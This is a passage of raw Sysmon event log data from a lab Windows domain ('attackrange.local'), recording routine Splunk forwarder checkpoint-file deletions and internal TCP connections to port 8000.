Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30F58B7F259E050AC3993617CCB27B67,SHA256=7BC5B4FDE704485ACF9FA5759598026BB8D90A7BD53F1B92916C65836ABDFCC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246480Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:31.601{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA64CDFCD735F44395F82ED664C57F9B,SHA256=22DB403343051AF2DD7C66B8DC62D98FF3FC8B846127561F0489622B7602414A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061625Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:32.646{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9ED573F23D43CE83E334D25E438A327,SHA256=0196DF34ED8C1CBD94E0AC2BCF2A434DCDE4EA8C65AA54ADB8898AFCD5AD8519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246484Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:32.601{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DF08E3C7F3383C07B8131C0E474358F,SHA256=0A48F01CBC4767858AB5B83FFFBD05273DE0E177122088A51F19663482EDA732,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246483Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:31.457{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64817-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246482Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:32.023{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB5B8EEF0AC422F810B958666B43D0E9,SHA256=017814B49899C36F896707081327071B57F1AE4BDE917D9FB6502A40CB1A1D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246481Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:32.023{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4FE2A6D9D668C44FA2B1F88A5A50B9F,SHA256=017DFB974B19B1BC31392740D70617D7F971F9FE1B35F18E95A105D9D5E8E004,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246485Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:33.617{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60CEE5E66FDB38F49656F20D8101D843,SHA256=15D664B721DFE6AC34B112B5E22A1C87E47C533367028F114BEB1F558119F99D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061626Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:34.006{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FFF1EBE524A090B1D710B36A1DDCE526,SHA256=7DFF05EB40DE2D15BF2C6B7B435F9F539EE8644342A05D71105C2BB9A52C67DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246486Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:34.632{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=129313697BE4977C4D5038A8D51B464F,SHA256=12B031CF00106D30919546836BA118ECFD3CBF624BFF42A5C3E1DD15F0F15643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061628Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:35.365{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EA7BEBAF5248F9029955A5451FD8E12,SHA256=B7C0393001F6397AA3CFE834913EC6EB08276314F7D2C9CAB215FA3D046BAEA8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061627Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:31.882{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54849-false10.0.1.12-8000- 23542300x8000000000000000246487Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:35.632{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=890EAFC5551730CA3416DBAD61A53550,SHA256=83779751FE70F16A1CF4D27419842B10216B751F2AA108EA2A3E4AEFA33F8039,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061630Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:36.725{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65128DEF573CD64CA9BDE3C40D387B28,SHA256=8E5BBA66B227AE9714C94A03C9E222B27834995A5925104508AD1F5970135097,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061629Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:36.725{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69FE451364211B18AC25037259BC2EF5,SHA256=C439D2D4D56F1EEB6993B64A902FE80CECFB629B50053000E74938301566B18B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246488Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:36.632{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3CCD7F1911C5D632EDE3DB68B4765DC,SHA256=0CE9719D351767055CED89CFB4DBCD603222770815233B85E06E74BB2433072D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246492Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:37.648{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E43B63B41DA62B7CEBCE218AFD8132,SHA256=DF404D0A8DCCBAC1DADA3C276B2427992F357A77C82251D9D52E5C8FE3175AE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246491Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:36.504{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64818-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246490Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:37.070{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB0B6525299ECCF688A0FC3B654F427A,SHA256=A0CDC2425F3DA99D9D28F2304CD480D6418FBEFDF6862688C609B0781E118C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246489Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:37.070{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB5B8EEF0AC422F810B958666B43D0E9,SHA256=017814B49899C36F896707081327071B57F1AE4BDE917D9FB6502A40CB1A1D1B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061631Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:38.084{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B00808662B57BA8A1F5A80D504C7D08,SHA256=4F41C95B7FEBC1DFD970DC4D80388D7C295320A5847F525CF1DFCE6B392C8CE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246493Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:38.648{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3AE736F6CCF6B918E1CD514BA8DDBA6,SHA256=3F33F36559252B79289F2CBCB4D3460ECDC719E54ABEA499B145A040994A6936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061632Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:39.444{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BEEE90AD9D7E55549BCBF07DB9DCB81,SHA256=24FC59191DC76A3ED3A99A53C9280138DD443BF9A40CFF5F51C3E1E2704107EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246494Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:39.664{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A726784325305FA8CD551686CDD4ADE,SHA256=9949C11BC0813280482548B9939BC9104176D43D83B46E64D1BA83CE0233AA77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061634Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:40.803{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB0AFA8DB07B8DD825A1FAC510A4115F,SHA256=3E6F059961F5540D79687E407446B8252ACC25F69AEF5576A37B2A12D0884EE9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061633Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:37.835{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54850-false10.0.1.12-8000- 23542300x8000000000000000246495Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:40.664{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDB26C02818393452EBFA45A7999AC52,SHA256=B503F43EFD230CB840A032363A74FD0CC93D84065446DF040D2971272CD53829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246496Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:41.664{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AFB913F3AEFFADA49A33A6D3500AFEE2,SHA256=1DBF0E25A662646FC69C6F6132AEAE556104F432F2FA46FFEAE0F8095F95453D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061635Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:42.163{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FF604A1677A25AFFCACAE892D90478F,SHA256=4C2516A55CCCD0A10DB31F64813A012C197E5A4E9E2A078918BB2D2760CBD50D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246500Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:42.711{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47B81F6DD263FCD35160190388F9FD1E,SHA256=1038D1D4999FDC23376F52EA7BDA35ABB5B90715E4B0CE131C8764DBD815CF63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246499Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:41.504{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64819-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246498Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:42.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C24AE5F55D9FBA92CD87E494C45FCE0,SHA256=027FB3452E08E2D425E02D08CE5DD6DD3047A19E04000BF0420B26DE7A2123FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246497Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:42.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB0B6525299ECCF688A0FC3B654F427A,SHA256=A0CDC2425F3DA99D9D28F2304CD480D6418FBEFDF6862688C609B0781E118C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061636Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:43.522{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EDF4D68C6F6E40CF37C1B378E482153,SHA256=66AA0FD721AE818A77C30C321240CCE2FB257079DBEEA8AE7A4F6F7C7E5AA183,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246501Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:43.711{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F65CB4226A2D0468C0E67C6C77B55954,SHA256=741E7128EEBC6B3ED2F6840361B9B29548DDA437AF91A47DE17A14F67FF841A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061637Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:44.897{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F211A14AF59AC990375B4F8D7623DD2,SHA256=EF482473829DF0858CC7A195DD071EFFBD96DE3211FF9E7CCA6B925092106B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246502Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:44.711{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D862E58D6D936F87736E3E520970684,SHA256=28442045F5DB6CE17DB9748CCEEA4305F7A2A22D941225B16E161F89810CD458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061638Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:45.569{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57B516FEF5DA2BAB71D415AA87E2498B,SHA256=1C7FAA605D7809C990EBFBC52E039744A3D7712C0D2301AEA292EA7B4DF1C00C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246503Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:45.711{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2894D3AEB67720175AF63483AC844708,SHA256=677DAC63CCE5239446184C630C58F23A8D4812C411CBC436ACD538E1F6E2E7A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061640Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:46.257{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4067874103B529BB5045BCC234D7E783,SHA256=0B4D0E376CDE75C90159AB2CDE05082A94D2D33C2DD18CBE72A7DCB0DE4E63F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061639Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:42.944{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54851-false10.0.1.12-8000- 23542300x8000000000000000246504Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:46.757{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8C290CE91B56DB4547C6AB31A8CBC6C,SHA256=93B24EA7D42018203B93F79D57325F4CBD10FA40147C77EE89F8D3EFC800A59C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061641Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:47.632{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=872F62D08AF9FC9EC6629D937C46BB37,SHA256=DE051E478EDB4AC819B69A9BA9B34A8C8219C8D723C30F28AB096385C46E5A3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246505Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:47.773{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35A4BED7042F829C65D3833E5A04E51B,SHA256=C57BD1C080C2B009199E7F59A49827F54FFEC8E734F7477832D0255F61FA92F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061642Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:48.992{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEF8E3291AC0DB739DC7ADF88D63A18B,SHA256=E8046DF9A52561AA730F2E9BDA07F25DF70CD18008765411BFC54A2840CED814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246509Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:48.773{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3C5AA2DF1650C565E4DDCD7C801D16A,SHA256=EA0683264D9BB147DD4B48C9D696F615377715B9879B6BDF0BC74EC7B905A51B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246508Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:47.488{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64820-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246507Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:48.054{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8411CFE6284C500BDE9F9B0625E90978,SHA256=E5AF731F58FCEE5ED4BA65A1FDB8D014B4F49DE8036DD70C20B2526FF8E4296D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246506Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:48.054{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C24AE5F55D9FBA92CD87E494C45FCE0,SHA256=027FB3452E08E2D425E02D08CE5DD6DD3047A19E04000BF0420B26DE7A2123FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246510Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:49.773{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5C62C19251F85008FA78B2CD33CE601,SHA256=2FE6D2E189430FFAA1B8EE1EDF0905599D135C597E79AA86408ED9ED89D7D8D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061644Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:50.351{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CBDFF085FA4D2DE2A8D1253179E3155,SHA256=CE1B663E192C430BAEE06495F089C7BC720B08783E3BB9892803BCBCECA3749D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061643Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:32:50.257{7F8C56E7-4E3C-6063-1100-00000000AF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7C36D496608260D3257BA8B621614BD9,SHA256=98E6D6E2AB6E9B1FF8DC6849DD825042EFB42CB49E03178A1AB8CB35EC9C2655,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246511Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:32:50.773{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 